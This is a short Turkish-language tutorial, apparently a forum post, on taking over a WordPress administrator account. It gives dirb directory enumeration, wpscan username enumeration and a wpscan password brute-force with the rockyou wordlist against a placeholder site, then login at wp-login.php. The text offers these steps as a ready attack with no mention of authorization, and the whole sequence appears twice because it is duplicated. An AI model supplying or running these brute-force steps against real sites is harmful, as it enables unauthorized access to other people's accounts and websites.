Önce kullanıcı adını öğrenmemiz lazım WordPresste admin kullanıcı adını saklamamışsa işimiz daha kolay olur drib ile dizinleri çekerek bakabilirsiniz hemen yapalım
dirb (site)
Eğer kullanıcı adını saklamamışsa burada kaba kuvvet saldırısı devreye giriyor wpscan kullanıcı adına kaba kuvvet saldırsı yapabiliriz hemen yapalım
wpscan --url (site) enumerate u
Kullanıcı adını bulduk
Şimdi ise şifreyi öğrenelim tekrar wpscan kullanmamız lazım bu sefer şifreye kaba kuvvet saldırısı yapıcaz uzun sürebilir
wpscan --url (site) --passwords /usr/share/wordlists/rockyou.txt
Şifreyide öğrendik (site)wp-login.php diyerek giriş yapabilirsiniz
dirb (site)
Eğer kullanıcı adını saklamamışsa burada kaba kuvvet saldırısı devreye giriyor wpscan kullanıcı adına kaba kuvvet saldırsı yapabiliriz hemen yapalım
wpscan --url (site) enumerate u
Kullanıcı adını bulduk
Şimdi ise şifreyi öğrenelim tekrar wpscan kullanmamız lazım bu sefer şifreye kaba kuvvet saldırısı yapıcaz uzun sürebilir
wpscan --url (site) --passwords /usr/share/wordlists/rockyou.txt
Şifreyide öğrendik (site)wp-login.php diyerek giriş yapabilirsiniz
Bu içeriği görmek için giriş yapın.